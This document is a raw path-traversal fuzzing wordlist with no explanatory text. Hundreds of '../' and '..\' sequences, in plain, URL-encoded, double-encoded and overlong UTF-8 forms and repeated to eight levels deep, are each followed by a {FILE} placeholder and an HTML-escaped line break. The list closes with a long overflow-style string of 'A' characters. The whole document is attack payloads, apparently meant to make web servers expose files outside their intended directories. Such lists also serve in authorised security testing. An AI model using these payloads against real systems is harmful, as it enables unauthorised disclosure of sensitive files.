%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA